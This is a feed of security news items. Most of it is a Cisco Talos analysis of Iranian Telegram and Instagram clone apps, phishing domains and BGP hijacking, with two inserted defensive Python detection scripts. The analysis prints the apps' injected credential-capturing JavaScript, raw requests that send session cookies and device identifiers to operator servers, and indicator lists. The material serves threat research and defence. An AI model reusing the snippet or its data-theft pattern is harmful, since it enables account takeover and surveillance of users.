There’s also the matter of Android security updates and the data around which hardware partners are best at pushing them out. Dave Kleidermacher, head of Android security and privacy, said at the Google I/O developer conference in May 2018 that the company was tracking which partners were best at pushing security updates and that it was considering adding hardware support details to future Android Ecosystem Security Transparency Reports. More recently, Google added stipulations to its OEM contracts mandating at least four security updates per year on Android devices.

It’s unclear why Google ultimately didn’t include this data in the report on Android ecosystem security, but Google has been hesitant to call out hardware partners for slow updates in the past. In addition to new requirements in Android partner contracts regarding security updates, there have been rules stating hardware partners need to update any device to the latest version of Android released in the first 18 months after a device launch. However, it has always been unclear what the punishment would be for breaking those rules. Presumably, it would be a ban on access to Google Play services, the Play Store and Google Apps, but there have never been reports of those penalties being enforced.

Google has taken steps to make Android updates easier, including Project Treble in Android 8.0 Oreo, which effectively decoupled the Android system from any software differentiation added by a hardware partner. But, since Android 7.x is still the most common version in the wild, it doesn’t appear as though that work has yielded much fruit yet.

Adding OS and security update stats to the Android Ecosystem Security Transparency Report could go a long way towards shaming OEMs into being better and giving consumers more information with which to make purchasing decisions, but time will tell if Google ever goes so far as to name OEMs specifically.

The post Android Ecosystem Security Transparency Report is a wary first step appeared first on Security Bytes.

Cloudflare Launches Android and iOS version of 1.1.1.1 DNS Service

By Waqas

Download the app and toggle it on to generate a VPN profile that will automatically reroute DNS traffic through the 1.1.1.1 DNS servers. On April 1, 2018, Cloudflare and APNIC launched the 1.1.1.1 public DNS service to make looking up web addresses faster and more secure. It is basically a DNS […]

This is a post from HackRead.com. Read the original post: Cloudflare Launches Android and iOS version of 1.1.1.1 DNS Service

New Android API Lets Developers Push Updates Within their Apps

You might have read somewhere online today that Google is granting Android app developers powers to forcefully install app updates…but it is not true. Instead, the tech giant is providing a new feature that will help users to have up-to-date Android apps all the time and yes, it's optional. Along with the launch of a number of new tools and features at its Android Dev Summit 2018, Google has

Persian Stalker pillages Iranian users of Instagram and Telegram

This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres and Vitor Ventura, with contributions from Eric Kuhla.

Introduction

State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.

Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.
Once installed, some of these Telegram "clones" have access to the mobile device's full contact list and messages, even if the user is also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." They are not malicious enough to be classified as malware, but are suspicious enough to be considered potentially unwanted programs (PUPs). This kind of software is difficult to detect, as it typically fulfills the functions the user expects of it (e.g., sending messages). The only time this kind of software is detected by security researchers is when it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.

Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while, targeting secure messaging apps. Some actors are also hijacking the device's BGP protocol. This technique redirects the traffic of all routers, without the device considering the origin of those new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and it is easily detectable, so the new routes won't be in place for very long.

Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran, its nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.

A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. The same rule applies to the cloned applications: installing applications from untrusted sources implies a certain degree of risk that users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.

Tactics

Functionality enhancement applications (grey)

Andromedaa.ir and Cambridge Universal Academy

Description of andromedaa.ir

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.

While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.

Whois information for andromedaa.ir

The andromedaa.ir domain is registered with the h0mayun@outlook.com email address. This is the same email address used to register other domains for the cloned Instagram and Telegram applications (see other sections below).

Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.

A partial list of the domains found

We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.

Certificate information

This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based on the low prevalence of those values in the SSL certificate, Talos associates this domain with the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.

List of domains associated with the same IP address

Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "followbeg.ir," and another in the organization field where it's identified as "andromeda," instead of andromedaa.


Certificate information

Description of Cambridge Universal Academy

Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.



Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.

Business model


All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.

Price list (original HTML errors were kept; translation by google.com)

While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing that highlights the benefits of using this service rather than others.

Lik3.org marketing (translation by google.com)

It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.

Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.

The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.

Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.

Application examples

Follower Begir Instagram iOS application

The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.

First screen after logging in

The developer added some features such as virtual currency and Persian language support, among others.

Certificate information

The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.

document.addEventListener('click', function () {
    // Fires on any click in the document, which includes the login button.
    try {
        var tu = document.querySelector('[name="username"]');
        var tp = document.querySelector('[name="password"]');
        // querySelector returns null (not undefined) when nothing matches, so
        // the typeof guard never triggers; a missing field throws on .value
        // and is handled by the catch block below.
        var tpV = (typeof tp == 'undefined') ? '' : tp.value;
        var tuV = (typeof tu == 'undefined') ? '' : tu.value;
    } catch (err) {
        var tuV = '';
        var tpV = '';
    }
    // The full visible text of the page is captured as well.
    var bd = document.getElementsByTagName('body')[0].innerText;
    var messageToPost = {
        'pu': tuV,
        'pp': tpV,
        'bd': bd
    };
    // Hands the captured values to the native app over the WebKit message bridge.
    window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);
}, false);


The purpose of this code is to hand control to the iOS application when the user clicks the "Connection" button. The application receives an event together with the values of the username and password fields and the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates to Instagram's servers.

During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1 
Host: v1.flbgr.com 
SESSIONID: [redacted] 
HEADER: vf1 
IOS: 3361ba9ec3480bcd3766e07cf6b4068a 
Connection: close 
Accept: */* 
Accept-Language: fr-fr 
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0 
Accept-Encoding: gzip, deflate 
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.

The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.

The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:

POST /start/fl.php?apk=35&m=ios HTTP/1.1 
Host: ndrm.ir 
HEADER: vf1 
Connection: close 
IOS: 3361ba9ec3480bcd3766e07cf6b4068a 
Accept: */* 
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0 
Accept-Language: en-gb 
Accept-Encoding: gzip, deflate 
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:

Instructions to trust the developer certificate

The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.

Ozvbegir(ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.

Application description (translation by Google Translate)

We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.

Most recent Ozvbegir certificate

Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information were clearly false.

Older version's certificate

Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.

Ozvbegir classes structure

In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.


Update check and reply

Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.

The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and, coincidentally, is the one with the ability to upgrade the application on mobile devices.

The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.


Phone number request

This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.


Sessions created on a single phone

The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1 
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1 
NUM: df27340104277f1e73142224d9cb59e8 
HEADER: bt6 
ADMIN: web 
Host: v1.ozvdarozv.com 
Connection: close 
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)
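As an added example (not code from the Talos post), the following Python script shows how a defender could spot this ping request in web-proxy logs: it matches each request's host against the backend domains listed in the post's IOCs (subdomains such as v1.ozvdarozv.com included) and reports which device and account identifiers (imei, phone, tg_id, access_hash and so on) the query string carries. The log lines, the "X" placeholder values and the ndrm.ir update path are constructed for the example.

```python
"""Added example (not from the Talos post): scan a web-proxy log for requests to the
clone backends named in the post and list which identifiers each request leaks."""
import re
from urllib.parse import urlsplit, parse_qs

# Backend domains taken from the post's IOC list (defang brackets removed).
CLONE_BACKEND_DOMAINS = {
    "ozvdarozv.com", "ozvbegir.com", "ndrm.ir", "andromedaa.ir",
    "talagram.ir", "hotgram.ir", "harsobh.com",
}

# Query parameters from the ping.php request that identify the device or the account.
IDENTIFYING_PARAMS = {"imei", "phone", "tg_id", "access_hash", "user_name", "tut"}

# Constructed proxy log in the form "<timestamp> <client-ip> <method> <url>".
# The ping.php line mirrors the post's request with sensitive values replaced by "X";
# the update.php path on ndrm.ir is an assumption; the other two lines are benign noise.
SAMPLE_LOG = """\
2018-10-01T08:14:02Z 10.10.4.21 GET http://v1.ozvdarozv.com/users/ping.php?access_hash=X&inactive=0&flags=1107&phone=X&tg_id=X&first_name=Pr2&apk=570&imei=X&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29
2018-10-01T08:14:03Z 10.10.4.21 GET https://www.example.com/index.html
2018-10-01T08:15:40Z 10.10.4.37 GET http://ndrm.ir/update.php?apk=570
2018-10-01T08:16:11Z 10.10.4.21 POST https://api.telegram.org/bot/getMe
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")


def is_clone_backend(host):
    """True if host is one of the listed domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in CLONE_BACKEND_DOMAINS)


def analyze_line(line):
    """Return an alert dict for a request to a clone backend, or None for anything else."""
    match = LOG_LINE.match(line.strip())
    if not match:
        return None
    url = urlsplit(match.group("url"))
    if not url.hostname or not is_clone_backend(url.hostname):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    return {
        "timestamp": match.group("ts"),
        "client": match.group("client"),
        "host": url.hostname,
        "path": url.path,
        # Which device/account identifiers this request carried, sorted for stable output.
        "identifiers": sorted(IDENTIFYING_PARAMS & set(params)),
    }


def analyze_log(text):
    """Run analyze_line over every line of a log and keep only the alerts."""
    return [alert for alert in map(analyze_line, text.splitlines()) if alert]


if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(f"{alert['timestamp']} {alert['client']} -> {alert['host']}{alert['path']} "
              f"identifiers={','.join(alert['identifiers']) or '-'}")
```

The host match is suffix-based on purpose: the post shows the ping going to v1.ozvdarozv.com while the IOC list names ozvdarozv.com, and the operators can add further subdomains without changing the registered domain.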


We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.


Channel information


Bitgram_dev

Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.

AseGram and BitGram on Google Play

Publisher information

Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.

Application examples



AseGram



The AseGram application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.

AseGram certificate

This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.

Set proxy code


Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.

The service org.pouyadr.Service.MyService starts upon boot. This calls the MessagesController.getGlobalMainSettings() from the original Telegram package and will change the settings to include the proxy configuration.

The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.

The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. 

This application creates a service that can't be disabled just by closing the application and that starts when the device boots up. The service contains the code needed to install new packages, although the installation itself is handled by the system's standard package manager. This service is also responsible for contacting IP addresses located in Iran. In fact, it uses the back end of the Telegram clone called "Advanced Telegram" (or "Golden Telegram"). This application is available at cafebazaar.ir, an Iranian state-sanctioned Android application store.


Advanced Telegram cafebazaar page (translation by Google translate)

It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find a legitimate use case in which an application that circumvents a ban should contact the same servers used by a cloned application vetted by the same country that applied the ban, which makes these communications highly suspicious.

The application also contains code to use SOCKS servers located in several countries, which could be used to circumvent the ban. However, during our research we never saw these being used. On the other hand, when the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.

Fake websites

Spoofed Telegram Websites

The most straightforward approach to gain access to an end user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.

Fake Telegram login page

This domain was registered on July 25, 2017. The tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — nami.rosoki@gmail[.]com — used to register this domain as well as other domains, and its passive DNS (pDNS) records, suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by another cybersecurity firm, Clearsky. Upon further inspection of the web page source code, it appears that the website was built using the GitHub project called "Webogram." There were also strings in the page source suggesting that this website's display was designed for iPhones.

Source code, GitHub.com reference

Newly identified Charming Kitten domains


While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had a continuous interest in gaining access to end users' mobile devices and specifically their chat messages.
These domains were also registered using the same modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.


This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.

BGP Routing Anomalies


Background


While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcements, Talos noticed some routing anomalies originating from the Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in Request for Comments (RFC) 4271 as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows internet communications to occur when a resource located outside of the requesting network or autonomous system is requested.

BGP is used across the internet to assist with the selection of the best routing path. It's important to note that this selection can be manipulated at the ISP level, since BGP allows route selection to depend on various factors. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:

The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.

These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."

While this was designed as a feature to combat networking issues, there was no adequate security mechanism added to prevent it from being abused. BGP offers no mechanism for security other than some methods like MD5 passwords for neighbours, IPSec or GTSM. None of these are default requirements and as such are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route. 

This could result in some traffic passing through a predetermined, sub-optimal route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. The effectiveness of a BGP hijacking session is measured by the number of BGP peers that receive the update message. The more peers that receive the update message, the more likely it is that traffic is being routed through the alternative, sub-optimal path pre-configured by the actor.

Pre-Planned Routing Activity from ASN 58224


One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iranian-based ASN 58224 announced an update for the prefix 185.112.156.0/22. The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.

The range that was potentially being hijacked was associated with the Hungary-based internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted for two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, it could have been a trial run for a larger BGP hijack attempt.


There were more significant BGP anomalies that originated from that same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as being "more specific" at the exact same time, down to the second, impacting communications with Telegram. When routers received this update message through the speaking system, they began routing some traffic destined to the Telegram servers through the ASN 58224. This campaign proved to be particularly effective, since a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.
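The following Python script is an added illustration (not Talos tooling) of the checks a route monitor such as BGPmon applies to events like these: an announcement of a known prefix from an unexpected origin ASN (the June 30 pattern), more-specific announcements of a covered prefix from a foreign origin (the July 30 pattern), and the "several prefixes from one ASN in the same second" signal the post uses as evidence of planning. Only 185.112.156.0/22 and AS58224 come from the text; the owner ASNs and the two stand-in Telegram prefixes are documentation placeholders because the post does not list them, and the announcement stream is constructed.

```python
"""Added example (not Talos tooling): flag BGP announcements that contradict a table of
expected prefix origins, the kind of check a route monitor such as BGPmon performs."""
import ipaddress
from collections import defaultdict, namedtuple

Announcement = namedtuple("Announcement", "time prefix origin_asn")

# Expected origins. 185.112.156.0/22 is the prefix from the June 30 event; its owner's ASN is
# a documentation placeholder (AS64496), as are the two stand-in prefixes below,
# because the post does not list those values.
EXPECTED_ORIGIN = {
    ipaddress.ip_network("185.112.156.0/22"): 64496,
    ipaddress.ip_network("203.0.113.0/24"): 64497,
    ipaddress.ip_network("198.51.100.0/24"): 64497,
}

# Constructed announcement stream modelled on the two events in the post: one origin change
# for the whole /22, then four more-specifics from AS58224 in the same second.
SAMPLE_UPDATES = [
    Announcement("2018-06-30T07:41:28Z", "185.112.156.0/22", 58224),
    Announcement("2018-07-30T06:28:25Z", "203.0.113.0/25", 58224),
    Announcement("2018-07-30T06:28:25Z", "203.0.113.128/25", 58224),
    Announcement("2018-07-30T06:28:25Z", "198.51.100.0/25", 58224),
    Announcement("2018-07-30T06:28:25Z", "198.51.100.128/25", 58224),
    Announcement("2018-07-30T06:30:00Z", "203.0.113.0/24", 64497),
    Announcement("2018-07-30T06:31:00Z", "192.0.2.0/24", 64498),
]


def classify(ann, expected=EXPECTED_ORIGIN):
    """Label one announcement against the expected-origin table."""
    net = ipaddress.ip_network(ann.prefix, strict=False)
    if net in expected:
        return "ok" if expected[net] == ann.origin_asn else "origin_mismatch"
    # Look for the longest expected prefix that covers this announcement.
    covering = [p for p in expected if p.version == net.version and net.subnet_of(p)]
    if not covering:
        return "unknown_prefix"
    parent = max(covering, key=lambda p: p.prefixlen)
    # A more-specific from the legitimate origin is usually traffic engineering;
    # from any other origin it is the pattern of the July 30 event.
    return "more_specific_ok" if expected[parent] == ann.origin_asn else "more_specific_hijack"


def find_bursts(updates, min_count=2):
    """Group announcements by (time, origin ASN) and return groups of at least min_count
    prefixes: the 'same second, same ASN' pattern the post treats as evidence of planning."""
    groups = defaultdict(list)
    for ann in updates:
        groups[(ann.time, ann.origin_asn)].append(ann.prefix)
    return [(t, asn, sorted(p)) for (t, asn), p in sorted(groups.items()) if len(p) >= min_count]


if __name__ == "__main__":
    for ann in SAMPLE_UPDATES:
        print(f"{ann.time} {ann.prefix:20} AS{ann.origin_asn:<6} {classify(ann)}")
    for t, asn, prefixes in find_bursts(SAMPLE_UPDATES, min_count=3):
        print(f"burst: {len(prefixes)} prefixes from AS{asn} at {t}: {', '.join(prefixes)}")
```

A real monitor would also track how many peers saw each update (the propagation measure the post uses) and how long the rogue route persisted before the corrected announcement; both events here were withdrawn after two hours and 15 minutes, which a timer on each open alert would surface.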

How BGP Hijacking could have enabled computer network operations


Theoretically, this announcement could have been one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram messages being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as documented by other security researchers two months prior, in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. There has been open-source reporting that suggests that Iran-based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with the Telegram SMS verification codes needed to gain access to Telegram accounts.

This particular capability would be attractive, since it could allow the actors to route traffic in neighboring ASNs through Iran. This could allow the threat actors to gain access to devices in nearby countries and compromise users who utilized non-Iranian telecommunications providers.

The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.

Conclusions


The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. But we found that there are several Telegram clones with several thousand installations that somehow contact IP addresses located in Iran, some of which advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives their operators total control over the messaging applications and, to some extent, users' devices.

The long-lasting activity of groups like Charming Kitten, even while using classic phishing techniques, is still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was citizenship, it is understandable that the vast majority of any country's population won't be as educated about cybersecurity as a cybersecurity professional, so even this classic technique could be highly effective.

While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assesses with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time to route two different Telegram ranges through four different subnets all associated with one ASN: 58224. This assessment also considers open-source reporting on Iran's complicated history with Telegram, from passing laws banning the use of Telegram to reports of outages resulting from Telegram's IP addresses being blocked in Iran.

Aside from the victims and the applications, Talos was unable to find any solid link between these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, with or without state sponsorship. Talos assesses with high confidence that users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.

IOC

Domains

talagram[.]ir
hotgram[.]ir
harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
30dn[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn--oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

Hash values

8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d - followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 - ozvdarozv.apk

GPlayed’s younger brother is a banker — and it’s after Russian banks

This blog post is authored by Vitor Ventura.

Introduction


Cisco Talos published its findings on a new Android trojan known as "GPlayed" on Oct. 11. At the time, we wrote that the trojan seemed to be in the testing stages of development, based on the malware's code patterns, strings and telemetry visibility. Since then, we discovered that there's already a predecessor to GPlayed, which we are calling "GPlayed Banking." Unlike the first version of GPlayed, this is not an all-encompassing trojan. It is specifically a banking trojan that's looking to target Sberbank AutoPay users, a service offered by the Russian state-owned bank.

GPlayed Banking is spread in a similar way to the original GPlayed. It's disguised as a fake Google app store, but actually installs the malware once it's launched. This further illustrates the point that Android users need to be educated on how to spot a malicious app, and that they should be careful as to what privileges they assign to certain programs.
The malicious application is on the left-hand side.

Trojan architecture and capabilities


This malware is written in .NET using the GPlayed environment for mobile applications. The malware code is implemented in a DLL called "PlayMarket.dll."
GPlayed Banking issues its package certificate under a fake name that's not related to the application's name, nor the package's name.
Certificate information

The Android package is named "lola.catgirl." The application uses the label "Play Google Market," with an icon designed to look like the legitimate Google app store, and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we wish to highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.
The working capabilities of this trojan are limited to the ones needed to perform its objective as a banking trojan. The only exception is that it also contains the ability to exfiltrate all of the user's received SMS messages to the command and control (C2).
